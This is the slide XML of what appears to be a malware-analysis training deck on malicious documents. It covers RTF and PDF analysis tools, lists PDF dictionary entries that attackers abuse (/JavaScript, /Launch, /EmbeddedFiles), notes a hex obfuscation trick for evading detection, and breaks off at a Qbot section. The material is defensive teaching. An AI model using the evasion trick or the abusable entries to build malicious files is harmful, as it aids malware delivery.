        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26598464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n-US" dirty="0"/>
              <a:t>RTF files.</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s-ES" dirty="0"/>
              <a:t>Control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>control word \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> rtfobj.py developed by Philippe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lagadec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> rtfdump.py tool developed by Didier Stevens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pyxswf.py tool allows you to detect, extract, and parse Flash objects (SWF format). Microsoft Windows JPEXS Free Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Decompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Adobe SWF Investigator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES"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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55729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7947D-5C0C-7E4F-A1E7-FB2CB209B4E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457202" y="157853"/>
            <a:ext cx="5766263" cy="506015"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BR" dirty="0"/>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5A51607-F801-C745-9FA7-D45F2043C66D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457202" y="884832"/>
            <a:ext cx="6672368" cy="4143184"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Introduction </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
              <a:t>Introduction to malicious documents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Powershell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" i="0" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>HTA files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Microsoft Office  OLE2 and OOXML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>MSG files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>RTF files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>PDF </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Technical Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> (Ashu)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0"/>
              <a:t>Sample Hashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" i="0" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Recomdation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q&amp;A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-BR" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40CDA9B0-D0BF-C94B-97EE-100A7BB58A23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF611178-6C3A-F247-8731-699DBDA96700}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16806107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n-US" dirty="0"/>
              <a:t>PDF</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dirty="0"/>
              <a:t>The PDF file format (Portable document format) is usually used to publish final versions of documents for distribution on the Internet, email, or as documentation on physical supports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The most widely used tool to view PDF documents is Adobe Acrobat Reader.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PDF format supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and flash embedded ActionScript scripts</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES"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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35385728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FE87F-2E39-EEBB-CEAB-7004D5A06660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>PDF Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35FBD6C4-0407-7DF5-F2D4-1267C8A6CC95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3BE2AAB6-80C9-D04C-812E-2AE858C1AEC4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="PDF] Digital Investigation of PDF Files: Unveiling Traces of Embedded  Malware | Semantic Scholar">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8391621E-1EC5-9C66-5104-B91DCC243138}"/>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457200" y="778331"/>
            <a:ext cx="6367460" cy="35033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84494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n-US" dirty="0"/>
              <a:t>PDF</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800" dirty="0"/>
              <a:t>It is therefore a very complex format with a set of characteristics that can be exploited by a malicious agent. : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Command execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Embedded files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>GoToE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Embedded Flash applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Encryption. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Parsing flexibility.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" sz="1200"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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93937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n-US" dirty="0"/>
              <a:t>PDF</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100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Certain dictionary entries present in the PDF document format can be used by malicious actors to implement attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/Root </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/JavaScript or /JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>GoTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/Launch and /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>EmbeddedFiles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/URI. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>submitForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> and /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>GoToR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>RichMedia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ObjStm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/JBIG2Decode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/Page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Eencrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/XFA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>There is the possibility of making it more difficult to detect malicious content by obfuscating these dictionary entries using hexadecimal codes. Example replace /JavaScript with /J#61vaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" sz="1200"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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9173607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n-US" dirty="0"/>
              <a:t>PDF</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400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>PDFiD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> tool written in python by Didier Stevens and accessible on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>REMnux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> via the command PDFid.py allows you to scan PDF documents for the presence of dangerous tags and dictionary entries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Peepdf.py developed by José Miguel Esparza allows scanning PDF documents to determine if they contain malicious content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The pdf-parser.py tool, also by Didier Stevens, allows you to parse a PDF document and identify its fundamental elements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The QPDF tool allows you to make structural modifications to PDF files without affecting their content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Origame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> is a Ruby framework designed for parsing, parsing, and forging PDF documents. It can also be used to create custom documents or to inject malicious code into existing documents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>A tool included in Origami is PDF Walker, which allows you to extract all objects from a pdf document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>PDF stream Dumper, developed by David Zimmer in another very good tool for Microsoft Windows environments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES"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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29392958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9238B-44DD-4DB5-8B6E-10ADB24E7110}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40022389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7E4F6-A68B-7522-C6C9-F6C8B885E14E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Qbot</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED0E330-25E6-7FA1-ADBC-21638327CB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Qbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
